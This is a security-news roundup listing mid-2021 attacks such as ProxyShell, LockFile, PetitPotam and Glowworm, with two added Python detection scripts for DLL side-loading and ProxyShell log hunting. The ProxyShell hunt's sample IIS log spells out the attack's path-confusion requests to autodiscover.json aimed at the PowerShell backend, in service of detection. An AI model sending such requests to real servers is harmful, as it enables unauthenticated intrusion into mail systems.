The hackers changed their obfuscation and encryption techniques every 37 days. This implies that the gang is highly motivated and possesses sophisticated detection evasion mechanisms.Cyware Alerts - Hacker News
August 24, 2021
DLL side-loading Attack Takes Advantage of Windows Search Order Full Text
Abstract
Threat actors can evade detection based on filename matching by renaming the binary executable, as the side-loading technique remains viable regardless of the executable's name.GB Hackers
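As an added example (not from the GBHackers article), a check that keys on what the article says survives renaming: the DLL's location. Windows resolves a DLL by name, and the application's own directory is searched before the system directories regardless of the SafeDllSearchMode setting (only the current directory moves), so a DLL whose name belongs in System32 but was loaded from the executable's folder is the side-loading signature, whatever the executable is called. The records are constructed in the shape of Sysmon Event ID 7 (`Image` / `ImageLoaded`); the baseline set of system DLL names and every path are hypothetical.

```python
"""Added example, not from the GBHackers article: flag image loads that look
like DLL side-loading by where the DLL came from, not by what the EXE is
called. Renaming the executable, the evasion the article describes, does not
change the DLL path, so this check still fires.

A hit is a DLL whose file name belongs to the system-DLL baseline (the names
inventoried from a clean System32) but which was loaded from somewhere else,
most often the executable's own directory, which Windows searches before the
system directories whatever SafeDllSearchMode says. Records are constructed
in the shape of Sysmon Event ID 7 (Image / ImageLoaded)."""

import ntpath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed baseline: DLL names an inventory of a clean System32 would contain.
SAMPLE_BASELINE = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptsp.dll", "userenv.dll"}

SAMPLE_LOADS = [  # constructed records; all paths are hypothetical
    {"Image": r"C:\Users\a\AppData\Local\Temp\update.exe",
     "ImageLoaded": r"C:\Users\a\AppData\Local\Temp\version.dll"},
    {"Image": r"C:\Users\a\AppData\Local\Temp\renamed_tool.exe",   # renamed host EXE
     "ImageLoaded": r"C:\Users\a\AppData\Local\Temp\DBGHELP.DLL"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll"},           # normal load
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendorcore.dll"},    # private DLL, not in baseline
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\ProgramData\cache\..\cache\wininet.dll"},  # non-system path, not beside EXE
]


def _norm(path):
    """Case-fold and collapse '..' so path comparisons are exact."""
    return ntpath.normpath(path).lower()


def side_load_candidates(loads, baseline_dlls):
    """Return (exe, dll, reason) for loads of a baseline-named DLL from a non-system path."""
    hits = []
    for rec in loads:
        exe, dll = _norm(rec["Image"]), _norm(rec["ImageLoaded"])
        if ntpath.basename(dll) not in baseline_dlls:
            continue
        dll_dir = ntpath.dirname(dll)
        if dll_dir in SYSTEM_DIRS:
            continue
        reason = ("loaded from EXE directory" if dll_dir == ntpath.dirname(exe)
                  else "loaded from non-system path")
        hits.append((exe, dll, reason))
    return hits
```

Two caveats a practitioner would want: DLLs on the KnownDLLs list are always mapped from System32, so they never appear as hits and are not side-loadable this way; and some legitimate software does ship private copies of system-named DLLs, so the baseline is best paired with signer information (Sysmon 7 also records `Signed` and `Signature`) before anything is auto-blocked.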
August 23, 2021
ProxyShell Attacks Pummel Unpatched Exchange Servers Full Text
Abstract
CISA is warning about a surge of ProxyShell attacks, as Huntress discovered 140 webshells launched against 1,900 unpatched Microsoft Exchange servers.Threatpost
August 23, 2021
Ransomware Hits Lojas Renner, Brazil’s Largest Clothing Store Chain Full Text
Abstract
Lojas Renner, Brazil’s largest clothing department store chain, said it suffered a ransomware attack that impacted its IT infrastructure and resulted in the unavailability of some of its systems, including its official web store.The Record
August 23, 2021
Post Office is new prime target in UK parcel delivery phishing attacks Full Text
Abstract
Along with this increased volume of online shopping, a new trend of phishing attacks is doing the rounds, in which cybercriminals impersonate parcel delivery companies in an attempt to steal financial details from their victims.Netcraft
August 23, 2021
PRISM attacks fly under the radar Full Text
Abstract
AT&T Alien Labs has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal though their internal threat analysis systems have flagged them as malicious.AT&T Cybersecurity
August 22, 2021
U.S. State Department reportedly hit by a cyberattack in recent weeks Full Text
Abstract
As per reports, the U.S. State Department was hit by a cyberattack, and notifications of a potentially serious breach were made by the Department of Defense Cyber Command.CNBC
August 22, 2021
WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of " ProxyShell " Microsoft Exchange vulnerabilities that were patched in April and May, including deploying LockFile ransomware on compromised systems. Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls and elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates. "An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine," CISA said . The development comes a little over a week after cybersecurity researchers sounded the alarm on opportunistic scanning and exploitation of unpatThe Hacker News
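As an added example (not from the CISA advisory or The Hacker News article), a hunt over IIS logs for the request shape that the publicly described ProxyShell chain starts with and that several of the entries on this page (the Huntress and Threatpost reports as well as this one) refer to: a request to `/autodiscover/autodiscover.json` whose query string carries an `@host` and an `Email=autodiscover/autodiscover.json...` value, which is what makes the front end proxy the request to a backend endpoint such as `/mapi/nspi` or `/powershell` without authentication. The log excerpt is constructed in IIS W3C format (the `cs-uri-query` field carries the query without the leading `?`); hostnames and addresses are hypothetical. A match is an attempt, not proof of success: a patched server logs the same lines.

```python
"""Added example, not from the CISA advisory or The Hacker News article: a hunt
over IIS logs for the ProxyShell pre-auth path-confusion requests.

The publicly described chain starts with requests to
/autodiscover/autodiscover.json whose query carries an '@host' and an
Email=autodiscover/autodiscover.json... value; this is what lets the front end
proxy the request to a backend endpoint such as /mapi/nspi or /powershell
without authentication. A matching request is an attempt, not proof of
success: patched servers log the same lines. Log content below is a
constructed W3C-format excerpt; the hostnames and addresses are hypothetical."""

import re
from urllib.parse import unquote

SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-08-20 11:02:13 GET /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 203.0.113.7 200
2021-08-20 11:02:15 POST /autodiscover/autodiscover.json @evil.example/powershell/?X-Rps-CAT=AAAA&Email=autodiscover/autodiscover.json%3F@evil.example 203.0.113.7 200
2021-08-20 11:03:01 GET /autodiscover/autodiscover.json - 10.0.0.5 401
2021-08-20 11:05:40 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail.example%2Fowa 10.0.0.9 200
2021-08-20 11:07:02 POST /Autodiscover/Autodiscover.json @evil.example/powershell/?X-Rps-CAT=AAAA 198.51.100.4 500
"""

AUTODISCOVER = re.compile(r"/autodiscover/autodiscover\.json$", re.I)
# Backend paths reached through the confusion; checked in order, first match wins.
BACKENDS = (("/powershell", "powershell backend (stage 2)"),
            ("/mapi/nspi", "mapi/nspi backend"))


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the '#Fields:' directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ", len(fields) - 1)  # IIS encodes spaces inside fields as '+'
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def proxyshell_hits(text):
    """Return (time, source ip, status, stage) for autodiscover path-confusion requests."""
    hits = []
    for rec in parse_w3c(text):
        if not AUTODISCOVER.search(rec["cs-uri-stem"]):
            continue
        query = unquote(rec["cs-uri-query"]).lower()
        if "@" not in query:          # the '@host' is the path-confusion marker
            continue
        stage = "path confusion"
        for needle, label in BACKENDS:
            if needle in query:
                stage = label
                break
        hits.append((rec["time"], rec["c-ip"], int(rec["sc-status"]), stage))
    return hits
```

Use the status code as a triage hint only: a 200 on the `/powershell` stage from an external address is the line to escalate, while a string of 4xx/5xx responses after the patch date tells you the scanners found you but got nowhere. Follow a genuine hit by checking the server for the web shells the other entries describe.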
August 21, 2021
Microsoft Exchange servers being hacked by new LockFile ransomware Full Text
Abstract
A new ransomware gang known as LockFile encrypts Windows domains after hacking into Microsoft Exchange servers using the recently disclosed ProxyShell vulnerabilities.BleepingComputer
August 21, 2021
U.S. State Department was recently hit by a cyber attack Full Text
Abstract
The U.S. State Department was recently hit by a cyber attack, the Department of Defense Cyber Command might have suffered a serious breach. The U.S. State Department was recently hit by a cyber attack, the Department of Defense Cyber Command is notifying...Security Affairs
August 21, 2021
OPAD: A New Adversarial Attack Targeting Artificial Intelligence Full Text
Abstract
Researchers discovered a new adversarial attack, OPAD, that can fool AI technologies by modifying the appearance of real 3D objects. One of the critical factors of such an attack is that no physical access to the objects is required. The successful demonstration of OPAD shows the possibility of...Cyware Alerts - Hacker News
August 21, 2021
Lojas Renner, Brazilian largest clothing store chain, was hit by ransomware Full Text
Abstract
Lojas Renner, the largest Brazilian department store clothing company, suffered a ransomware attack that impacted its IT infrastructure. Lojas Renner, the largest Brazilian department store clothing company, announced it had suffered a ransomware...Security Affairs
August 20, 2021
Cloudflare mitigated the largest ever volumetric DDoS attack to date Full Text
Abstract
Web infrastructure and website security company Cloudflare announced it had mitigated the largest ever volumetric DDoS attack to date. Cloudflare, the web infrastructure and website security company, announced that it has mitigated the largest ever...Security Affairs
August 19, 2021
Threat actors hacked US Census Bureau in 2020 by exploiting a Citrix flaw Full Text
Abstract
Threat actors breached the servers of US Census Bureau on January 11, 2020, exploiting an unpatched Citrix ADC zero-day vulnerability, OIG revealed. A report published by the US Office of Inspector General (OIG) revealed that threat actors breached...Security Affairs
August 18, 2021
US Census Bureau hacked in January 2020 using Citrix exploit Full Text
Abstract
US Census Bureau servers were breached on January 11, 2020, by hackers after exploiting an unpatched Citrix ADC zero-day vulnerability as the US Office of Inspector General (OIG) disclosed in a recent report.BleepingComputer
August 18, 2021
Japan’s Tokio Marine is the latest insurer to be victimized by ransomware Full Text
Abstract
Ransomware struck Japan’s largest property and casualty insurer, Tokio Marine Holdings, at its Singapore branch. It’s the third major insurer to disclose a ransomware attack in recent months.Cyberscoop
August 18, 2021
New ‘Optical Adversarial Attack’ uses low-cost projector to trick AI Full Text
Abstract
The new attack has been dubbed as an OPtical ADversarial attack (OPAD) and involves using three objects: a low-cost projector, a camera, and a computer in order to execute the attack.Hackread
August 18, 2021
Japanese insurer Tokio Marine discloses ransomware attack Full Text
Abstract
Tokio Marine Holdings, a multinational insurance holding company in Japan, announced this week that its Singapore branch, Tokio Marine Insurance Singapore (TMiS), suffered a ransomware attack.BleepingComputer
August 17, 2021
Govt hackers impersonate HR employees to hit Israeli targets Full Text
Abstract
Hackers associated with the Iranian government have focused attack efforts on IT and communication companies in Israel, likely in an attempt to pivot to their real targets.BleepingComputer
August 17, 2021
Malware campaign uses clever ‘captcha’ to bypass browser warning Full Text
Abstract
A malware campaign uses a clever captcha prompt to trick users into bypassing browsers warnings to download the Ursnif (aka Gozi) banking trojan.BleepingComputer
August 17, 2021
Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military Full Text
Abstract
The campaign involves a two-step attack. During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target.Trend Micro
August 17, 2021
Brazilian government discloses National Treasury ransomware attack Full Text
Abstract
The Brazilian Ministry of Economy has disclosed a ransomware attack that hit some of National Treasury's computing systems on Friday night, right before the start of the weekend.BleepingComputer
August 17, 2021
Brazilian National Treasury Hit with Ransomware Attack Impacting IT Systems Full Text
Abstract
The first assessments so far have found there was no damage to the structuring systems of the National Treasury, such as the platforms relating to public debt administration.ZDNet
August 17, 2021
Memorial Health System in Ohio Latest to be Hit With Ransomware Attack Full Text
Abstract
Memorial Health System detected a security incident early on Sunday morning that prompted the organization to divert emergency care patients from three of its hospitals to other area facilities.Gov Info Security
August 16, 2021
Hive ransomware attacks Memorial Health System, steals patient data Full Text
Abstract
In what appears to be an attack from the Hive ransomware gang, computers of the non-profit Memorial Health System have been encrypted, forcing staff to work with paper charts.BleepingComputer
August 16, 2021
T-Mobile confirms servers were hacked, investigates data breach Full Text
Abstract
T-Mobile has confirmed that threat actors hacked its servers in a recent cyber attack but is still investigating whether customer data was stolen.BleepingComputer
August 16, 2021
New Code-poisoning Attack could Corrupt Your ML Models Full Text
Abstract
A group of researchers discovered a new type of code-poisoning attack that can manipulate natural-language modeling systems via a backdoor. By nature, this is a blind attack, in which the attacker does not need to observe the execution of their code or the weights of the backdoored model during...Cyware Alerts - Hacker News
August 16, 2021
AMD Secure Encrypted Virtualization undone by electrical attack Full Text
Abstract
The attack was inspired by a separate attack, dubbed Voltpillager, used to defeat Intel's Software Guard Extensions (SGX), a similar secure enclave system for x86 microarchitecture.The Register
August 15, 2021
Glowworm Attack allows sound recovery via a device’s power indicator LED Full Text
Abstract
The Glowworm attack leverages optical emanations from a device's power indicator LED to recover sounds from connected peripherals and spy on electronic conversations. Boffins from the Ben-Gurion University of the Negev devised a new attack technique,...Security Affairs
August 14, 2021
New Glowworm Attack Recovers Device’s Sound from Its LED Power Indicator Full Text
Abstract
A novel technique leverages optical emanations from a device's power indicator LED to recover sounds from connected peripherals and spy on electronic conversations from a distance of as much as 35 meters. Dubbed the " Glowworm attack ," the findings were published by a group of academics from the Ben-Gurion University of the Negev earlier this week, describing the method as "an optical TEMPEST attack that can be used by eavesdroppers to recover sound by analysing optical measurements obtained via an electro-optical sensor directed at the power indicator LED of various devices." Accompanying the experimental setup is an optical-audio transformation (OAT) that allows for retrieving sound by isolating the speech from the optical measurements obtained by directing an electro-optical sensor at the device's power indicator LED. TEMPEST is the codename for unintentional intelligence-bearing emanations produced by electronic and electromechanical information-The Hacker News
August 14, 2021
Scripps Health Reports Financial Toll of Ransomware Attack Full Text
Abstract
The recent ransomware attack that disrupted Scripps Health's IT systems and patient care for nearly a month has so far cost the San Diego-based organization nearly $113 million, including $91.6 million in lost revenue.Gov Info Security
August 13, 2021
Exchange Servers Under Active Attack via ProxyShell Bugs Full Text
Abstract
There’s an entirely new attack surface in Exchange, a researcher revealed at Black Hat, and threat actors are now exploiting servers vulnerable to the RCE bugs.Threatpost
August 13, 2021
Cyberattack hits vaccine records for thousands of Canada’s Durham Region children Full Text
Abstract
The personal information of more than 3000 children in daycares throughout Durham Region was stolen in a cyberattack early this year that CTV News Toronto has learned is larger than previously known.CTV News
August 13, 2021
Cornell University Researchers Uncover Backdoor Attack to Evade Any Known Defense Full Text
Abstract
A team of researchers have uncovered a new type of backdoor attack that they showed can "manipulate natural-language modeling systems to produce incorrect outputs and evade any known defense."ZDNet
August 13, 2021
Why Is There A Surge In Ransomware Attacks? Full Text
Abstract
The U.S. is presently combating two pandemics--coronavirus and ransomware attacks. Both have partially shut down parts of the economy. However, in the case of cybersecurity, lax security measures allow hackers to have an easy way to rake in millions. It's pretty simple for hackers to gain financially, using malicious software to access and encrypt data and hold it hostage until the victim pays the ransom. Cyber attacks are more frequent now because it is effortless for hackers to execute them. Further, the payment methods are now friendlier to them. In addition, businesses are willing to pay a ransom because of the growing reliance on digital infrastructure, giving hackers more incentives to attempt more breaches. Bolder cybercriminals A few years back, cybercriminals played psychological games before getting bank passwords and using their technical know-how to steal money from people's accounts. They are bolder now because it is easy for them to buy ransomware softwareThe Hacker News
August 13, 2021
Microsoft warns of an evasive year-long spear-phishing campaign targeting Office 365 users Full Text
Abstract
Microsoft warns of a long-running spear-phishing campaign that has targeted Office 365 customers in multiple attacks since July 2020. Microsoft revealed that a year-long spear-phishing campaign has targeted Office 365 customers in multiple attacks...Security Affairs
August 12, 2021
IT Giant Accenture Hit by LockBit Ransomware; Hackers Threaten to Leak Data Full Text
Abstract
Global IT consultancy giant Accenture has become the latest company to be hit by the LockBit ransomware gang, according to a post made by the operators on their dark web portal, likely filling a void left in the wake of DarkSide and REvil shutdown. "These people are beyond privacy and security. I really hope that their services are better than what I saw as an insider," read a message posted on the data leak website. Accenture said it has since restored the affected systems from backups. LockBit, like its now-defunct DarkSide and REvil counterparts, operates using a ransomware-as-a-service (RaaS) model, roping in other cybercriminals (aka affiliates) to carry out the intrusion using its platform, with the payments often divided between the criminal entity directing the attack and the core developers of the malware. The ransomware group emerged on the threat landscape in September 2019, and in June 2021 launched LockBit 2.0 along with an advertising campaign to recruitThe Hacker News
August 11, 2021
Consulting group Accenture hit by cyberattack Full Text
Abstract
Global consulting group Accenture confirmed Wednesday that it had been hit by a cyberattack, becoming the latest in a string of organizations in recent months to be targeted.The Hill
August 11, 2021
Accenture has been hit by a LockBit 2.0 ransomware attack Full Text
Abstract
Global consulting giant Accenture has allegedly been hit by a ransomware attack carried out by LockBit 2.0 ransomware operators. IT and consulting giant Accenture was hit by a ransomware attack carried out by LockBit 2.0 ransomware operators,...Security Affairs
August 11, 2021
DBREACH: A New Attack Against Databases Full Text
Abstract
Researchers have detailed a new type of attack called Database Reconnaissance and Exfiltration via Adaptive Compression Heuristics (DBREACH) against databases at the Black Hat US 2021 hybrid event. It could result in information disclosure and loss. Attackers can further monitor the database us...Cyware Alerts - Hacker News
August 10, 2021
LockBit Ransomware Attacks Rise, Warns ACSC Full Text
Abstract
The Australian Cyber Security Centre (ACSC) issued an alert warning of increasing attacks on Australian organizations across multiple industry sectors by the LockBit 2.0 ransomware.Cyware Alerts - Hacker News
August 10, 2021
Illinois’ FOID Card System Hit By Cyber Attack Full Text
Abstract
On the heels of cyber attacks on the Illinois Attorney General's Office and the Illinois Department of Employment Security, comes word of trouble for the Illinois State Police (ISP).1440wrok
August 10, 2021
RansomEXX Hackers Threaten to Leak Data of Intel, AMD After Attack on Gigabyte Full Text
Abstract
The RansomExx gang is threatening to release more than 112 GB of data that may include confidential documents from chip makers Intel and AMD and the American firm American Megatrends.The Times Of India
August 9, 2021
‘Glowworm’ Attack Turns Power Light Flickers into Audio Full Text
Abstract
Researchers have found an entirely new attack vector for eavesdropping on Zoom and other virtual meetings.Threatpost
August 9, 2021
City of Joplin paid a 320K ransom after a ransomware Attack Full Text
Abstract
A ransomware attack hit the City of Joplin, forcing the IT staff to shut down the city's computers. In the end, the insurer for Joplin paid $320,000 to the threat actors. A ransomware attack last month hit the City of Joplin forcing the IT staff to shut down the city’s...Security Affairs
August 7, 2021
RansomEXX ransomware hit computer manufacturer and distributor GIGABYTE Full Text
Abstract
Taiwanese manufacturer and distributor of computer hardware GIGABYTE was a victim of the RansomEXX ransomware gang. RansomEXX ransomware gang hit the Taiwanese manufacturer and distributor of computer hardware GIGABYTE and claims to have stolen...Security Affairs
August 06, 2021
Computer hardware giant GIGABYTE hit by RansomEXX ransomware Full Text
Abstract
Taiwanese motherboard maker Gigabyte has suffered a RansomEXX ransomware attack where threat actors threaten to release 112 GB of data if a ransom is not paid.BleepingComputer
August 05, 2021
Prometheus: The $250 service behind recent malware attacks Full Text
Abstract
Security researchers investigating multiple malware distribution campaigns found that an underground traffic distribution service called Prometheus is responsible for delivering threats that often lead to ransomware attacks.BleepingComputer
August 5, 2021
Italian energy company ERG hit by LockBit 2.0 ransomware gang Full Text
Abstract
ERG SPA, an Italian energy company, reports a minor impact on its operations after the recent ransomware attack conducted by LockBit 2.0 gang. Recently the Italian energy company ERG was hit by the LockBit 2.0 ransomware gang, now the company reported...Security Affairs
August 05, 2021
A Wide Range of Cyber Attacks Leveraging Prometheus TDS Malware Service Full Text
Abstract
Multiple cybercriminal groups are leveraging a malware-as-a-service (MaaS) solution to run a wide range of malicious software distribution campaigns that result in the deployment of payloads such as Campo Loader, Hancitor, IcedID , QBot , Buer Loader , and SocGholish against individuals in Belgium as well as government agencies, companies, and corporations in the U.S. Dubbed " Prometheus TDS " (short for Traffic Direction System) and available for sale on underground platforms for $250 a month since August 2020, the service is designed to distribute malware-laced Word and Excel documents and divert users to phishing and malicious sites, according to a Group-IB report shared with The Hacker News. More than 3,000 email addresses are said to have been singled out via malicious campaigns in which Prometheus TDS was used to send malicious emails, with banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance emerging the prominentThe Hacker News
August 4, 2021
Kaseya ransomware attack sets off race to hack service providers -researchers Full Text
Abstract
Now that criminals see how powerful MSP attacks can be, “they are already busy, they have already moved on and we don’t know where,” said Victor Gevers, head of the Dutch institute that warned Kaseya.Reuters
August 4, 2021
Isle of Wight schools hit by ransomware Full Text
Abstract
The attack, which encrypted data, hit the schools and their umbrella organization, the Isle of Wight Education Federation, between July 28th and 29th, according to the Federation.Computing
August 04, 2021
Russian Federal Agencies Were Attacked With Chinese Webdav-O Virus Full Text
Abstract
An amalgam of multiple state-sponsored threat groups from China may have been behind a string of targeted attacks against Russian federal executive authorities in 2020. The latest research, published by Singapore-headquartered company Group-IB, delves into a piece of malware called " Webdav-O " that was detected in the intrusions, with the cybersecurity firm observing similarities between the tool and that of the popular Trojan called " BlueTraveller ," that's known to be connected to a Chinese threat group called TaskMasters and deployed in malicious activities with the aim of espionage and plundering confidential documents. "Chinese APTs are one of the most numerous and aggressive hacker communities," researchers Anastasia Tikhonova and Dmitry Kupin said . "Hackers mostly target state agencies, industrial facilities, military contractors, and research institutes. The main objective is espionage: attackers gain access to confidential dataThe Hacker News
August 4, 2021
Advanced Technology Ventures Suffers Ransomware Attack Impacting Personal Information of Limited Partners Full Text
Abstract
In its letter to the Maine AG’s office, ATV said it believes the names, email addresses, phone numbers, and Social Security numbers of the individual investors in its funds were stolen in the attack.TechCrunch
August 04, 2021
New Chinese Spyware Being Used in Widespread Cyber Espionage Attacks Full Text
Abstract
A threat actor presumed to be of Chinese origin has been linked to a series of 10 attacks targeting Mongolia, Russia, Belarus, Canada, and the U.S. from January to July 2021 that involve the deployment of a remote access trojan (RAT) on infected systems, according to new research. The intrusions have been attributed to an advanced persistent threat named APT31 (FireEye), which is tracked by the cybersecurity community under the monikers Zirconium (Microsoft), Judgement Panda (CrowdStrike), and Bronze Vinewood (Secureworks). The group is a "China-nexus cyber espionage actor focused on obtaining information that can provide the Chinese government and state-owned enterprises with political, economic, and military advantages," according to FireEye. Positive Technologies, in a write-up published Tuesday, revealed a new malware dropper that was used to facilitate the attacks, including the retrieval of next-stage encrypted payloads from a remote command-and-control server,The Hacker News
August 03, 2021
Ransomware attack hits Italy’s Lazio region, affects COVID-19 site Full Text
Abstract
The Lazio region in Italy has suffered a reported ransomware attack that has disabled the region's IT systems, including the COVID-19 vaccination registration portal.BleepingComputer
July 30, 2021
An Indian firm facing 1,738 cyber attacks a week on average, claims report Full Text
Abstract
An organization in India faced cyberattacks 1,738 times on average per week in the last six months, compared to 757 attacks per organization globally, a report showed on Thursday.The Times Of India
July 30, 2021
Entertainment Tech Provider D-Box Discloses Ransomware Attack Impacting IT Systems Full Text
Abstract
In a recent statement, the Canadian immersive entertainment technology provider said it was “gradually resuming its activities following a ransomware cyber-attack” first publicly disclosed on July 14.The Daily Swig
July 30, 2021
Meteor was the wiper used against Iran’s national railway system Full Text
Abstract
The recent attack against Iran’s national railway system was caused by wiper malware dubbed Meteor and not by ransomware, as initially thought. According to research from Amnpardaz and SentinelOne, the recent attack...Security Affairs
July 28, 2021
Chinese cyberspies used a new PlugX variant, dubbed THOR, in attacks against MS Exchange Servers Full Text
Abstract
A China-linked cyberespionage group, tracked as PKPLUG, employed a previously undocumented strain of a RAT dubbed THOR in recent attacks. A China-linked cyberespionage group tracked as PKPLUG (aka Mustang Panda and HoneyMyte), which...Security Affairs
July 28, 2021
Axie Infinity Player Wallets Targeted by Poisoned Google Ads Content Full Text
Abstract
The top NFT Ethereum-based game Axie Infinity is a Pokemon-like play-to-earn game that lets its users earn SLP (Smooth Love Potion). Threat actors are targeting the players with a fake crypto wallet.Cyren
July 27, 2021
South Africa’s logistics company Transnet SOC hit by a ransomware attack Full Text
Abstract
Transnet SOC Ltd, a large South African rail, port and pipeline company, announced it was hit by a disruptive cyber attack. South Africa’s logistics company Transnet SOC was hit last week by a disruptive cyberattack that halted its operations...Security Affairs
July 26, 2021
Microsoft Warns of Weeks-long Malspam Campaign Abusing HTML Smuggling to Bypass Email Security Systems Full Text
Abstract
As explained by SecureTeam and Outflank, HTML smuggling is a technique that allows threat actors to assemble malicious files on users’ devices by clever use of HTML5 and JavaScript code.The Record
July 26, 2021
New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains Full Text
Abstract
A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM under a bad actor's control using the MS-EFSRPC interface and share its authenThe Hacker News
July 25, 2021
WhatsApp chief: US allies’ national security officials targeted with NSO malware Full Text
Abstract
High-ranking government officials around the world were targeted by governments using spyware from NSO Group, according to WhatsApp head Will Cathcart.The Hill
July 24, 2021
Japanese computers hit by a wiper malware ahead of 2021 Tokyo Olympics Full Text
Abstract
Japanese researchers spotted an Olympics-themed wiper targeting Japanese users ahead of the 2021 Tokyo Olympics. Tokyo Olympics could be a great opportunity for cybercriminals and malware authors, the US FBI warned private US companies of cyberattacks...Security Affairs
July 24, 2021
Obtaining password hashes of Windows systems with PetitPotam attack Full Text
Abstract
A researcher found a flaw in Windows OS, tracked as PetitPotam, that can be exploited to force remote Windows machines to share their password hashes. Security researcher Gilles Lionel (aka Topotam) has discovered a vulnerability in the Windows...Security Affairs
July 23, 2021
New PetitPotam attack allows take over of Windows domains Full Text
Abstract
A new NTLM relay attack called PetitPotam has been discovered that allows threat actors to take over a domain controller, and thus an entire Windows domain.BleepingComputer
July 23, 2021
Cyber attackers will have weaponised tech environments to harm or kill humans by 2025: Report Full Text
Abstract
In a new release from Gartner, researchers have estimated that cyberattackers will have weaponised operational technology (OT) environments to successfully harm or kill humans by the year 2025.The Times Of India
July 23, 2021
Significant Historical Cyber-Intrusion Campaigns Targeting ICS Full Text
Abstract
To raise awareness of the risks and improve the protection of critical infrastructure, CISA and the FBI have released a Joint Cybersecurity Advisory as well as updates to five alerts and advisories.US CERT
July 23, 2021
Kaseya obtained a universal decryptor for REvil ransomware attack Full Text
Abstract
The software provider Kaseya announced to have obtained a universal decryptor for the REvil ransomware. Earlier this month, a massive supply chain attack conducted by the REvil ransomware gang hit the cloud-based managed service provider platform...Security Affairs
July 21, 2021
Kubernetes Cloud Clusters Face Cyberattacks via Argo Workflows Full Text
Abstract
Misconfigured permissions for Argo’s web-facing dashboard allow unauthenticated attackers to run code on Kubernetes targets, including cryptomining containers.Threatpost
July 21, 2021
Kaseya ransomware attack highlights cyber vulnerabilities of small businesses Full Text
Abstract
The recent ransomware attack on software group Kaseya hit small businesses especially hard, targeting companies that often have few resources to defend themselves and highlighting long-standing vulnerabilities.The Hill
July 21, 2021
Rail ticket machines in northern England hit by ransomware attack Full Text
Abstract
Ticket machines operated by the British government-run Northern Trains have been put out of action by a suspected cyber-attack intended to extort money, the company said on Monday.Reuters
July 20, 2021
Microsoft secured court order to take down domains used in BEC campaign Full Text
Abstract
Microsoft has seized 17 malicious homoglyph domains used by crooks in a business email compromise (BEC) campaign targeting its users. Microsoft's Digital Crimes Unit (DCU) has seized 17 domains that were used by scammers in a business...Security Affairs
July 19, 2021
What’s Next for REvil’s Victims? Full Text
Abstract
Podcast: Nothing, says a ransomware negotiator who has tips on staying out of the sad subset of victims left in the lurch, mid-negotiation, after REvil’s servers went up in smoke.Threatpost
July 18, 2021
Ransomware hits law firm counseling Fortune 500, Global 500 companies Full Text
Abstract
Campbell Conroy & O'Neil, P.C. (Campbell), a US law firm counseling dozens of Fortune 500 and Global 500 companies, has disclosed a data breach following a February 2021 ransomware attack.BleepingComputer
July 18, 2021
Comparis customers targeted by scammers after ransomware attack Full Text
Abstract
Leading Swiss price comparison platform Comparis has notified customers of a data breach following a ransomware attack that hit and took down its entire network last week.BleepingComputer
July 17, 2021
Ecuador’s state-run CNT telco hit by RansomEXX ransomware Full Text
Abstract
Ecuador's state-run Corporación Nacional de Telecomunicación (CNT) has suffered a ransomware attack that has disrupted business operations, the payment portal, and customer support.BleepingComputer
July 16, 2021
Cyberattack on Moldova’s Court of Accounts destroyed public audits Full Text
Abstract
Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed.BleepingComputer
July 15, 2021
SonicWall Warns Secure VPN Hardware Bugs Under Attack Full Text
Abstract
SonicWall issued an urgent security alert warning customers that some of its current and legacy secure VPN appliances were under active attack.Threatpost
July 15, 2021
Safari Zero-Day Used in Malicious LinkedIn Campaign Full Text
Abstract
Researchers shed light on how attackers exploited Apple web browser vulnerabilities to target government officials in Western Europe.Threatpost
July 15, 2021
Ransomware Attacks Targeting Unpatched EOL SonicWall SMA 100 VPN Appliances Full Text
Abstract
